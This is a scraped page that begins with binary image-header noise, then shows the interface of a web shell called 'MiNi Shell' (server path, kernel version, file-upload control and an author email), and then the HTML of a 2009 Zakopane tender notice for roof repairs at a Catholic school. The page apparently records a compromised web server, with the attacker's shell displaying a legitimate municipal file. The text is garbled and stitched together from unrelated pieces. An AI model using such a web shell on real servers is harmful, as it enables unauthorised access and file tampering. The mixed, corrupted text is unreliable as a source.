JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090105/3227-N-2009.html

<p class="kh_header"><b>Zakopane: ZP/341/52/08 wykonanie robót budowlanych w budynku Szkoły Katolickiej przy ul. Piłsudskiego 21 w Zakopanem</b><br>
<b>Numer ogłoszenia: 3227 - 2009; data zamieszczenia: 05.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/52/08 wykonanie robót budowlanych w budynku Szkoły Katolickiej przy ul. Piłsudskiego 21 w Zakopanem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana pokrycia dachowego i wentylacji w Szkole Katolickiej ul. Piłsudskiego 21  w Zakopanem.
Zakres zamówienia  obejmuje wykonanie remontu w skład którego wejdą:
1.  Montaż  i demontaż rusztowań obejmujący:
1.1. Wyrównanie terenu.
1.2. Montaż, usztywnienie i zamocowanie z wykonaniem otworów i obsadzeniem haków.
1.3. Wykonanie daszków nad wejściami.
1.4. Okresowe sprawdzenie sztywności rusztowań.
1.5. Demontaż rusztowań i przygotowanie do przewozu.
1.6. Koszt pracy rusztowania

2. Roboty rozbiórkowe obejmujące:
2.1. Demontaż wsporników instalacji uziemiającej i odgromowej.
2.2. Rozebranie rynien z blachy nie nadającej się do użytku.
2.3. Rozebranie rur spustowych z blachy nie nadającej się do użytku.
2.4. Rozebranie pokrycia dachowego z blachy nie nadającej się do użytku
2.5. Rozebranie obróbek blacharskich: murów ogniowych, okapów kołnierzy, gzymsów itp. z blachy nie nadającej się do użytku.
2.6. Rozebranie konstrukcji więźb dachowych, deskowanie dachu z desek 
w odstępach.
2.7. Wywóz blachy do składowiska złomu samochodami samowyładowczymi.

3.Remont dachu obejmujący :
3.1. Wymianę elementów konstrukcyjnych dachu, krokwie zwykłe - przyjęto 10 % ilości.
3.2. Ułożenie na krokwiach ekranu zabezpieczającego z folii wiatroizolacyjnej
3.3. Impregnację, przycięcie i przybicie kontrłat.
3.4. Deskowanie połaci dachowych z tarcicy nasyconej gr. 25 mm (przyjęto
50% desek z rozbiórki).
3.5. Impregnację ognioochronną elementów drewnianych dachu.
3.6. Obróbkę z blachy ocynkowanej wyłazów dachowych w dachach krytych blachą.
3.7. Różne obróbki z blachy ocynkowanej przy szerokości w rozwinięciu ponad 25cm.
3.8. Założenie pasów usztywniających z blachy ocynkowanej, szerokości 0,20m.
3.9. Pokrycie dachu blachą ocynkowaną, (rozstaw rąbka prostopadłego do okapu 57mm), blacha 0.50mm.
3.10. Rynny dachowe - montaż z gotowych elementów, półokrągłe, Fi15cm, blacha ocynkowana.
3.11. Rury spustowe - montaż z gotowych elementów, okrągłe, Fi15cm, blacha ocynkowana.
3.12. Odtworzenie i pomiary instalacji odgromowej.
3.13. Naprawę gzymsów betonowych pod okapami.

4. Remont grawitacyjnej wentylacji  wewnętrznej obejmujący:
4.1. Rozebranie metalowego czopucha do komina dymowego.
4.2. Oczyszczenie przewodów kominowych.
4.3 Zamurowanie otworów w ścianach z cegły.
4.4. Wykucie otworów i wstawienie kratek wentylacyjnych.
4.5. Badanie przewodu kominowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.21.00-2, 45.11.11.00-9, 45.26.11.00-5, 45.26.00.00-7, 45.26.12.10-9, 45.31.11.00-1, 45.45.31.00-8, 45.33.12.10-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości  2.500,00 zł  ( słownie:  dwa tysiące pięćset złotych)

2.	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2) poręczeniach bankowych;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn.zm.).

3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85124047481111000048718666 Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj.27 stycznia    2009r. do godz.  12°°
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj.27 stycznia 2009r.do godz. 12°° w  Biurze  ds. zamówień publicznych pok. nr 8 parter.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art.22 ust.1 ustawy Prawo zamówień publicznych tj.:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia, lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 

- wykonawca musi wykazać ,że dysponuje lub będzie dysponował osobami  posiadającymi odpowiednie kwalifikacje potrzebne do prawidłowego wykonania zamówienia w tym musi wykazać ,że  dysponuje lub będzie dysponował  kierownikiem budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające wydane na podstawie wcześniejszych przepisów, uprawniające do kierowania robotami budowlanymi i  legitymującym się aktualną przynależnością do   Izby  Inżynierów Budownictwa
             - wykonawca musi wykazać ,że w okresie ostatnich 5 lat wykonał co najmniej 2 roboty 
              tj. remont budynku z wchodzącą w jego zakres wymianą pokrycia  z blachy płaskiej  
              kładzionej na tzw. rąbek stojący i leżący , których wartość łącznie nie jest              
               mniejszej niż   100,000  zł,( słownie; sto tysięcy złotych)

3)	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;
    - wykonawca musi wykazać się posiadaniem  środków     finansowych lub zdolnością    
          kredytową w wysokości nie mniejszej niż  35.000,00  zł
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych

Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.aktualny odpis z właściwego rejestru , albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru , lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.podpisane oświadczenie o spełnianiu warunków, stanowiące załącznik nr 2 do niniejszej siwz,

3. na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć   do    oferty  wykaz ( należy wypełnić   załącznik nr 5    do siwz) wykonanych w   okresie ostatnich 5 lat przed dniem wszczęcia niniejszego  postępowania , a jeżeli okres  prowadzenia działalności  jest krótszy- w tym okresie) że  wykonał  co najmniej  2 roboty o zakresie podobnym swoim rodzajem i wartością robotą  stanowiącym przedmiot zamówienia tj. remont budynku z wchodzącą w jego zakres wymianą pokrycia  z blachy płaskiej kładzionej na tzw. rąbek stojący i leżący o wartości sumarycznej dla dwóch nie mniejszej niż 100,000  zł,( słownie; sto tysięcy złotych)

Wykonawca zobowiązany jest do powyższego wykazu załączyć dokumenty ( np.: referencje) potwierdzające, że   podane  w wykazie  roboty  zostały wykonane należycie. 

4.wypełniony druk oferty stanowiący załącznik nr 3 do  siwz(wykonawca może założyć ofertę na własnym formularzu, lecz jego  treść i układ muszą być zgodne z formularzem załączonym do siwz).

5. wykaz osób( należy wypełnić załącznik nr 6 do  siwz) , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności; lub  pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5, wykonawca wskazał osoby, którymi będzie dysponował. Z wykazu lub  pisemnego zobowiązania innego podmiotu musi wynikać ,że  kierować  zleconymi robotami będą  osoby posiadające uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające wydane na podstawie wcześniejszych przepisów, uprawniające do kierowania robotami budowlanymi i  legitymujące się aktualna przynależnością do   Izby  Inżynierów Budownictwa 

6.na potwierdzenie dysponowania potencjałem technicznym koniecznym do        
  prawidłowego wykonania zamówienia wykonawca zobowiązany jest do oferty załączyć  wykaz   sprzętu - należy wypełnić załącznik nr   8 do  siwz.  
lub pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 6, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.

7. na  potwierdzenia  znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający wymaga  załączenia do oferty  informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków     finansowych lub zdolność kredytową wykonawcy w wysokości nie mniejszej niż 35.000,00   zł ( słownie: trzydzieści pięć tysięcy    złotych ) wystawionej nie   wcześniej niż 3   miesiące przed upływem terminu składania ofert,

8. wykonawca do oferty ma załączyć  kosztorys ofertowy sporządzony  
    wg wszystkich pozycji  przedmiaru stanowiącego załącznik nr 1 do niniejszej siwz i    
   wykazanych w nim podstaw. W cenach wykonawca jest zobowiązany uwzględnić  
   wszystkie koszty    związane z realizacją zlecanych robót.



Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt XIII -1 niniejszej specyfikacji, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Uwaga! Dokument, o którym  mowa  powyżej powinien  być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu o którym mowa  w pkt XIV a  zastępuje się go  dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania.


UWAGA! 
Dokumenty mogą być przedstawione w formie kopii  (kserokopii)  poświadczonych za zgodność z oryginałem  przez wykonawcę.

Zamawiający zastrzega sobie prawo wglądu w oryginały dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Przetargi - postępowania poniżej progów unijnych.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2009 godzina 12:00, miejsce: Biuro ds zamówień publicznych 
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com